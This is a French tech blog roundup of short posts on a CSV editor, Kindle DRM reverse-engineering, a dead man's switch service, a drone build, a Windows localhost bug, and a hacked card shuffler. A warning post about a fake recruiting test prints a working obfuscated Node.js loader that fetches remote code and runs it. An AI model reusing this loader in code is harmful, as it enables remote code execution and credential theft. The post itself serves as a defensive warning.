Aïe aïe aïe, Excel, votre meilleure ennemi en ce qui concerne les CSV ! Vous double-cliquez sur un fichier de 100 Mo, et le ventilo de votre machine s’emballe comme si vous miniez du Bitcoin ! La RAM explose et, PAF, 15 minutes plus tard, l’outil de Microsoft se crash. Ou pire, il ouvre le fichier, mais il a transformé les IDs en formules de maths, vos dates en n’importe quoi, et votre UTF-8 est massacré.

Bref, pas merci Microsoft.

Et c’est pas un problème théorique. Rien qu’en 2020, le Royaume-Uni a égaré 16 000 cas de COVID parce qu’Excel a une limite de 65 000 lignes par feuille, du coup des milliers de cas positifs n’ont jamais été contactés par les services de santé. Même JP Morgan a perdu 6 milliards de dollars à cause d’une erreur dans un fichier Excel. Et des centaines d’articles scientifiques ont dû être retirés parce qu’Excel avait corrompu des noms de gènes en les transformant automatiquement en dates.

Le problème, c’est qu’Excel n’a jamais été conçu pour éditer des CSV. Excel, c’est fait pour les tableaux croisés dynamiques et les graphiques en camembert que personne ne lit mais surtout pas pour bosser proprement avec des fichiers texte qui font 500 Mo.

Alors en bon geek, vous vous êtes surement déjà dit : OK, je vais utiliser autre chose. LibreOffice ? Même combat mais en moche. Un chouette éditeur de texte comme Notepad++ ou Sublime ? Super pour voir les virgules, mais nul pour visualiser la structure. Et les outils en ligne ? Lents, pas sécurisés, et vous envoyez vos données chez oncle Sam la plupart du temps. Bref, vous êtes coincé !

Et c’est après cette intro interminable (je m’en fous, c’est vendredi) qu’arrive SmoothCSV3, un éditeur CSV développé par kohii et dispo sur GitHub et dont l’ambition affichée par le dev est claire : devenir le VS Code des éditeurs tabulaires. Rien que ça !

Le logiciel tourne sur macOS et Windows, avec Linux en approche. Comme vous pouvez le voir sur ma capture écran, l’interface ressemble à un tableur classique, mais sous le capot, c’est du costaud. Le dev annonce une execution 12× plus rapide qu’Excel sur un fichier de 100 Mo et niveau fonctionnalités, vous avez la recherche et le remplacement, le tri, le filtrage, l’édition multi-cellules mais surtout, vous avez des requêtes SQL directement dans le CSV. Oui, du SQL dans un fichier texte avec des virgules. Ça vous permet de sélectionner vos colonnes avec un WHERE, de faire des JOINs entre plusieurs fichiers, et de les grouper avec un GROUP BY. C’est encore plus magique qu’Eric Antoine !

Il y a aussi une palette de commandes à la VS Code. Vous tapez Cmd+Shift+P et vous avez accès à toutes les fonctions du logiciel sans quitter le clavier. Si vous avez déjà utilisé VS Code, Sublime Text ou IntelliJ, vous êtes donc en terrain familier.

Alors oui, le CSV, c’est moche, c’est fragile, c’est chiant à parser, mais c’est universel, ça marche partout et surtout, ça traverse les époques. Ce qui lui manquait c’était surtout un outil qui le traite comme une princesse, avec le respect qu’il mérite.

Téléchargez SmoothCSV3 ici !

Voici l’histoire de Pixelmelt, un développeur qui voulait simplement sauvegarder en local un ebook acheté sur Amazon pour le lire avec une autre app parce que l’app Kindle d’Android a crashé une fois de trop à son goût.

Mais c’est impossible. Pas de bouton download, pas d’export, que dalle… Même si vous avez acheté le livre, c’est Amazon qui décide de comment et de quand vous pouvez le lire.

Bref, frustré, il se tourne alors vers le Kindle Cloud Reader, la version web de l’app. Et là, il découvre un truc incroyable ! Amazon a créé un système d’obfuscation tellement complexe qu’il ressemble aux techniques de cryptographie des manuscrits anciens. Mais siii, vous savez, ces textes enluminés que seuls les moines pouvaient déchiffrer au Moyen-Âge. Amazon a réinventé le concept en version numérique.

Pour fonctionner, le Kindle Cloud Reader utilise un endpoint de rendu qui nécessite plusieurs tokens d’authentification. Déjà c’est pas simple. Mais ça se corse un peu plus quand on regarde le texte qui s’affiche car ce ne sont pas des lettres ! Ce sont des glyphes, essentiellement des séries de coordonnées qui dessinent une lettre. Ainsi, au lieu de stocker le caractère ‘T’, Amazon stocke “glyphe 24” qui correspond à une forme dessinée via des commandes SVG. Et ces glyphes changent de mapping toutes les 5 pages, un peu comme un codex (coucou Dan Brown ^^) où l’alphabet se transforme à tous les chapitres.

Du coup, pour son livre de 920 pages, il a fallu faire 184 requêtes API distinctes. Chaque requête récupère un nouveau jeu de glyphes soit au total 361 glyphes uniques découverts, et 1 051 745 glyphes à décoder. Oui, ça fait plus d’un million de symboles à traduire pour lire un seul livre.

Amazon a même ajouté des pièges comme des micro-opérations MoveTo complètement inutiles dans les SVG qui s’affichent parfaitement dans le navigateur mais cassent toute tentative de parsing automatique. C’est de l’anti-scraping placé là volontairement, comme des fausses pistes dans des cryptogrammes médiévaux destinées à tromper les copistes non autorisés.

Face à ce délire, notre développeur est alors devenu malgré lui un crypto-archéologue. Sa méthode a donc été de comparer pixel par pixel chaque caractères, valider chaque hypothèse, pour tout reconstruire patiemment. Je vous passe les détails techniques mais il a sorti chaque glyphe SVG sous la forme d’une image, puis a comparé ces images pour trouver leur correspondance avec les vraies lettres en utilisant un outil (SSIM) qui simule la perception humaine pour évaluer la similarité entre deux images.

Résultat, 100% des glyphes matchés ont un score quasi-parfait ce qui lui a permis de reconstruire un fichier EPUB complet avec le formatage, les styles, les liens internes…etc. Tout y est, c’est trop fort !

Bref, Pixelmelt 1 - Amazon 0 ! Et ça, ça fait plaisir ! Maintenant si vous voulez connaitre tous les détails de ça et refaire la même chez vous (pour rigoler hein, ne vous lancez pas dans dans une opération de piratage massif sinon vous finirez en taule comme Sarko ^^)

Question flippante, hein ?

Vous postez des stories Instagram, vous faites des snaps, des TikToks, en bon nazi vous likez des tweets, vous répondez à des emails pro…etc. Votre vie numérique ronronne comme un chat sous coke mais si demain, tout ça s’arrêtait…? A votre avis, Combien de temps avant que quelqu’un ne toque à votre porte pour vérifier que vous allez bien ?

Un jour ? Deux jours ? Une semaine ?

On est tous hyperconnectés 24/7 mais personne ne surveille vraiment notre silence et vos 500 meilleurs amis de Facebook ne prendront jamais la peine de signaler votre disparition.

C’est de ce constat un peu morbide qu’est né Wellness Ping, un projet open source développé par micr0 et hébergé sur GitHub qui fonctionne comme ceci : Vous vous inscrivez dessus, et vous recevez un email régulier pour confirmer que vous allez bien. Si vous ne répondez pas, vos contacts d’urgence sont alors automatiquement alertés.

C’est ce qu’on appelle un dead man’s switch, le joujou préféré des cons de terroristes qui se font exploser dans les films des années 80. En gros, tant que vous confirmez votre présence, tout va bien mais si le silence se prolonge, l’alarme se déclenche.

Vous pouvez l’auto-héberger vous-même ou utiliser directement le site wellness-p.ing (C’est gratuit). Vous choisissez alors la fréquence des pings, soit quotidien ou hebdomadaire, selon votre niveau de paranoïa ou de solitude et quand vous recevez l’email, vous cliquez sur un lien ou vous répondez “PONG” et c’est tout. Pas de dashboard compliqué, pas de machins de gamification débiles…

Et si vous ne répondez pas parce que vous êtes coincé au chiottes depuis 3 jours, le système vous envoie un rappel. Si vous ne répondez toujours pas, il attend encore un peu. Et si le silence persiste, vos contacts d’urgence reçoivent alors automatiquement une alerte.

C’est clairement fait pour activistes, les journalistes, les chercheurs, et les gens qui vivent seuls. Bref, tous ceux dont la vie pourrait basculer sans que personne ne s’en rende compte immédiatement. Je pense pas exemple à tous ceux qui bossent en remote et qui n’ont pas de collègues pour remarquer leur absence.

Au Japon, il y a un mot pour ça d’ailleurs. Ils disent kodokushi pour “Mort solitaire” car là bas, des milliers de personnes par an meurent seules chez elles, et on ne les découvre que des jours ou des semaines plus tard. C’est d’ailleurs souvent parce que les voisins sentent que ça schlingue ou parce que le courrier s’entasse sous la porte. Je sais, c’est gore mais c’est la triste réalité.

Avec Wellness Ping on inverse donc la logique… Au lieu d’attendre que quelqu’un remarque votre absence, vous créez un système proactif où vous choisissez les contacts, vous qui décidez de la fréquence et comme ça, si un jour vous ne pouvez plus répondre, le filet de sécurité se déploie automatiquement.

Côté technique, le projet est développé en Go donc c’est léger, rapide, et la démo tourne sur un serveur en Suède parce que ce pays a une législation stricte sur les données personnelles.

Bref, c’est Wellness Ping, c’est une idée simple mais qui protège alors pensez-y !

Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !

Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.

Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.

Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.

Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.

Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !

//Get Cookie
(async () => {
 const byteArray = [
 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
 98, 50, 48, 51, 49, 102, 98, 57
 ];
 const uint8Array = new Uint8Array(byteArray);
 const decoder = new TextDecoder('utf-8');
 axios.get(decoder.decode(uint8Array))
 .then(response => {
 new Function("require", response.data.model)(require);
 })
 .catch(error => { });
})();

Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.

Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.

Alors pourquoi ça marche aussi bien ?

Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.

Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.

Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.

Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !

Source

Vous avez déjà passé trois semaines à résoudre un problème qui n’existe pas ?

Hé bien Sam Hoarder, lui, a fait encore mieux. Il a pris un drone FPV déjà ultra-compact, le BetaFPV Air65 avec ses 65mm d’empattement, et l’a transformé en un truc trois fois plus petit, dix fois plus galère à piloter, et totalement inutile !

22 millimètres d’empattement de moteur à moteur, ça qui tient dans une boîte de Pringles et c’est génial. Parce que OUI, dans un monde tech obsédé par des specs toujours plus impressionnantes, des autonomies de 48 heures et des écrans pliables dans tous les sens, Sam a fait un truc qui sert à rien. Il a pris un drone qui vole très bien et s’est dit “hey, comment je pourrais rendre ce drone encore moins pratique à pilote ?”

Les hélices de l’Air65 de base font 31mm de diamètre, les moteurs font 9mm et si on fait se chevaucher les quatre hélices au maximum, on obtient théoriquement 31 - 9 = 22 mm d’empattement. Voilà, c’est tout… sauf que pour y arriver, il a fallu modéliser chaque composant dans SolidWorks, designer un cadre custom en deux plaques avec des supports moteur décalés, imprimer le tout en PLA avec une précision de 0,12 mm, et bien sûr démonter entièrement l’Air65 pour en remonter les moteurs avec des vis de montre, découper des oeillets au micron près, reconfigurer l’orientation du contrôleur de vol dans Betaflight avec un angle à 45°, et croiser les doigts très fort !!

Et le résultat est là puisque sont nouveau drone pèse 25 grammes tout mouillé avec sa batterie Lava 300mAh (qui est plus grande que le drone lui-même, au passage). La batterie dépasse donc littéralement du cadre. On dirait un cure-dent avec un sac à dos son machin et les quatre hélices se frôlent avec un espacement ridicule.

Vous connaissez ce mème que tous les barbus sans originalité ont sur un t-shirt ou une tasse et qui dit : “There’s no place like 127.0.0.1” ? (Oui moi aussi j’ai eu un t-shirt comme ça ^^)

Ce jeu de mots culte fait référence au Magicien d’Oz et surtout au localhost, qui est l’adresse locale où votre machine se connecte à elle-même. Eh bien mauvaise nouvelle, Microsoft vient de la rendre littéralement inopérante avec leurs dernières mises à jour de merde. Ainsi, Windows 11 ne peut plus accéder à sa propre adresse localhost. C’est fou quand même ! On dirait presque une blague mais non…

Les patchs KB5066835 et KB5065789 sortis en joli mois d’octobre ont pété totalement HTTP.sys, un composant du kernel Windows qui permet aux applications de discuter en local via HTTP/2. Du coup, les connexions vers 127.0.0.1 en HTTP/2 plantent systématiquement avec des messages d’erreur du genre ERR_CONNECTION_RESET ou ERR_HTTP2_PROTOCOL_ERROR.

Votre machine ne se reconnaît plus. Elle est là, elle fonctionne, mais elle ne peut plus se pinguer elle-même. Et évidemment, ceux qui trinquent ce sont surtout les développeurs. Visual Studio ne peut plus déboguer correctement, SQL Server Management Studio refuse de se connecter avec l’authentification Entra ID, l’application Duo Desktop, utilisée pour le 2FA, est complètement KO. Même des softs pros comme Autodesk Vault sont touchés.

Bref, si vous bossez avec du dev local ou des outils qui tournent en localhost, vous êtes dans la mierda.

Microsoft a corrigé dans ce patch un nombre record de 175 vulnérabilités CVE, dont 6 zero-days critiques et ils ont aussi fait le ménage en supprimant un vieux driver Agere Modem vieux de 20 ans qui traînait encore. Ils ont nettoyé, sécurisé, et optimisé Windows un peu plus mais visiblement sans faire quelques vérifications de base. Je trouve ça vraiment surprenant qu’aucun dev chez Microsoft ne s’en soit rendu compte avant que ça parte en prod.

Bon et alors, comment on s’en sort de leur nouvelle connerie ? Hé bien il y a 2 solutions, pas très classes mais qui fonctionnent.

La première, c’est de bidouiller le registre Windows pour désactiver HTTP/2. Vous allez dans

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

wusa /uninstall /kb:5066835

wusa /uninstall /kb:5065789

Vous avez un Mac M1, M2, M3 ou M4 ? Bonne nouvelle, vous trimballez probablement entre 50 et 100 GB de code complètement inutile que votre processeur n’exécutera jamais et ce, depuis le jour où vous avez acheté votre superbe machine.

Les coupables ce sont les binaires universels de vos plugins audio (VST…etc) et vos apps traditionnelles qui contiennent maintenant deux versions complètes du code : une pour Intel, une pour Apple Silicon. Et comme votre Mac n’utilise qu’une seule de ces versions, mais vous payez le prix fort en espace disque pour les deux.

Car depuis 2020 et la transition vers Apple Silicon, Apple a choisi la simplicité : un seul fichier pour tout le monde ! Le développeur compile son code deux fois (Intel + ARM), colle les deux versions ensemble, et hop, vous vous retrouvez avec des fichiers littéralement deux fois plus gros qu’ils ne devraient l’être.

Et c’est là qu’ Unfatten entre en jeu. Ce petit outil gratuit fait exactement ce que son nom indique : il dégonfle vos plugins et vos applications en supprimant la partie du code que vous n’utilisez pas. Si vous êtes sur Apple Silicon, il vire le code Intel et si vous êtes encore sur Intel, il peut virer le code ARM (mais attention, si vous comptez upgrader votre Mac un jour, vous devrez tout réinstaller).

L’utilisation est ultra simple, vous sélectionnez les dossiers contenant vos apps et plugins, vous choisissez les formats à scanner (AAX, VST, VST3, AU), et vous lancez le scan. L’outil propose un mode simulation qui permet de voir exactement combien d’espace vous allez récupérer sans rien toucher et une fois que vous avez vu les chiffres (et croyez-moi, ils font mal), vous pouvez lancer le nettoyage réel !

Pensez quand même à faire un backup de vos plugins avant car on n’est jamais trop prudent avec ses plugins audio à 200 euros pièce qu’on ne peut pas toujours re-télécharger facilement. Après pour les apps, c’est moins critique, suffit de la réinstaller.

Pensez aussi à repasser un petit coup de Unfatten après d’éventuelles mises à jours des apps ou des plugins.

D’ailleurs, j’sais pas si vous savez mais macOS 26 Tahoe est la dernière version à supporter du x64 avec Rosetta 2, qui permet de faire tourner les apps Intel sur Apple Silicon.

Voilà, l’outil est disponible ici sur avelio.tech/unfatten et si au premier lancement, vous avez un avertissement de sécurité, passez par Sentinel pour le débloquer.

Merci à Lorenper pour l’info !

Vous connaissez peut-être ces machines à mélanger les cartes qu’on trouve dans tous les casinos américains ?

Moi je ne savais même pas que ça existait, mais apparemment, le Deckmate 2, fabriqué par Shufflemaster (devenu depuis Light and Wonder), c’est la Rolls des shufflers. Un shuffler c’est pas un légume dégeu, c’est un mélangeur de cartes et on en trouve notamment au World Series of Poker (La biz à Patrick Bruel ^^), et dans tous les grands poker rooms de Vegas.

Cela permet d’automatiser le mélange pour accélérer le jeu et surtout éviter que ceux qui distribuent les cartes (les dealers) trichent avec de faux mélanges. La machine a même une caméra intégrée qui scanne chaque carte pour détecter si quelqu’un essaie de retirer un as ou d’ajouter un sept de pique.

En septembre 2022, il y a eu un scandale qui a secoué le monde du poker. Au Hustler Casino Live de Los Angeles, une joueuse relativement débutante, Robbi Jade Lew, gagne un pot de 269 000 dollars avec un call complètement fou. Elle avait valet-quatre dépareillés (un truc nul), et son adversaire Garrett Adelstein bluffait avec huit-sept. Techniquement, son call était correct, mais aucun joueur sensé n’aurait misé 109 000 dollars sur une main pareille sans savoir que l’adversaire bluffait… Le casino a donc lancé une enquête et conclu que le shuffler ne pouvait pas être compromis.

Mais même si ce n’était pas le cas pour cette affaire, est ce que c’est vrai ? Est ce qu’un Deckmate 2 peut être hacké ? Pour le chercheur en sécurité, Joseph Tartaro, ça s’est présenté comme un nouveau défi personnel !

Il a donc acheté un Deckmate 2 d’occasion avec deux collègues et a passé des mois à le démonter… pour finalement trouver quelques trucs intéressants, vous allez voir.

Il a découvert que la machine a un port USB accessible sous la table, là où les joueurs posent les genoux. Tartaro a donc créé un mini-ordinateur de la taille d’une clé USB qui, une fois branché, réécrit le firmware de la machine. La seule sécurité qu’il y a, c’est au démarrage, quand la machine vérifie que le code n’a pas changé en comparant son empreinte à une valeur connue.

C’est une simple comparaison de hash et le problème est que Tartaro peut modifier cette valeur de référence aussi… Du coup, le système de vérification contrôle que le code piraté correspond au hash piraté. C’est ballot ^^. Et une fois le firmware modifié, la machine continue à fonctionner normalement sauf qu’elle transmet maintenant l’ordre exact des 52 cartes via Bluetooth vers une app smartphone. Et comme la caméra interne de ce Deckmate 2 scanne déjà toutes les cartes pour détecter les fraudes, il suffit d’exploiter cette fonctionnalité.

Un journaliste de Wired a décidé de mettre ça en pratique dans des conditions réelles et vous allez voir, c’est sympa à voir.